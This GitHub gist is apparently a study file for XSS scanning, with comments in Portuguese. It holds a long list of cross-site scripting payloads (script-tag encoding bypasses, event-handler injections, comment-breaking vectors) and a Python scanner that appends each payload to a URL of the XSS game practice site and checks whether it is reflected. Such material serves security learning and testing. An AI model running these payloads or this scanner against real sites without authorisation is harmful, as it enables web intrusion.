Arquivo para estudo de Scan XSS
| <script>alert(0)</script> | |
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> | |
| <audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |
| <video src=1 href=1 onerror="javascript:alert(1)"></video> | |
| <body src=1 href=1 onerror="javascript:alert(1)"></body> | |
| <image src=1 href=1 onerror="javascript:alert(1)"></image> | |
| <object src=1 href=1 onerror="javascript:alert(1)"></object> | |
| <script src=1 href=1 onerror="javascript:alert(1)"></script> | |
| <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |
| <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |
| <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |
| <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |
| <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |
| <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |
| <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |
| <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |
| <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |
| <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |
| <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |
| <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |
| <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |
| <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |
| <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |
| <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |
| <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |
| <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |
| <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |
| <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |
| <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |
| <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |
| <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |
| <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |
| <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |
| <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |
| <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |
| <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |
| <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |
| <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |
| <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |
| <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |
| <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |
| <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |
| <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |
| <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |
| <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |
| <object onError object onError="javascript:javascript:alert(1)"></object onError> | |
| <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |
| <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |
| <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |
| <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |
| <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |
| <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |
| <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |
| <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |
| <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |
| <body onload body onload="javascript:javascript:alert(1)"></body onload> | |
| <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |
| <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |
| <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |
| <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |
| <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |
| <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |
| <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |
| <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |
| <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |
| <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |
| \x3Cscript>javascript:alert(1)</script> | |
| '"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |
| <script>javascript:alert(1)</script\x0D | |
| <script>javascript:alert(1)</script\x0A | |
| <script>javascript:alert(1)</script\x0B | |
| <script charset="\x22>javascript:alert(1)</script> | |
| <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |
| `"'><img src='#\x27 onerror=javascript:alert(1)> |
| from urllib import request | |
| URL_TARGET = 'https://xss-game.appspot.com/level1/frame?query=' | |
| # ARQUIVO COM FONTE XSS: https://github.com/payloadbox/xss-payload-list | |
| file_payload = 'file.txt' | |
| # ABRINDO ARQUIVO DE PAYLOADS PARA INJECT NA URL | |
| data_file_inject = open(file_payload, 'rt',encoding = "utf8") | |
| data_inject = data_file_inject.readlines() | |
| # FUNCTION PARA ENVIO DE REQUEST | |
| def sendRequest(url_request): | |
| try: | |
| header_set = {'User-Agent': 'user agent teste'} | |
| connection = request.Request(url_request, headers=header_set) | |
| response = request.urlopen(connection) | |
| str_body = response.read() | |
| # str_header = response.headers | |
| # str_codeFull = response.code | |
| # str_Code = int(''.join(filter(str.isdigit, str(response.code)))) | |
| return str_body | |
| except: | |
| return False | |
| # PROCESSO DE CONCATANECAÇÃO PARA MONTAR A URL | |
| for line_inject in data_inject: | |
| # ENVIANDO REQUEST COM URL CONCATENADA | |
| url_inject = URL_TARGET + line_inject | |
| return_request_body = sendRequest(url_inject) | |
| try: | |
| # VALIDANDO SE EXISTE ALGUM RESULTADO HTML | |
| if return_request_body: | |
| # VALIDANDO SE EXISTE O PAYLOAD XSS DENTRO DO RETORNO HTML | |
| line_inject_clear = line_inject.strip() | |
| if line_inject_clear in str(return_request_body): | |
| print(f"\n[+] XSS Detected on {url_inject}") | |
| else: | |
| print("[x] Not XSS Detected") | |
| except Exception as e: | |
| print(e) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment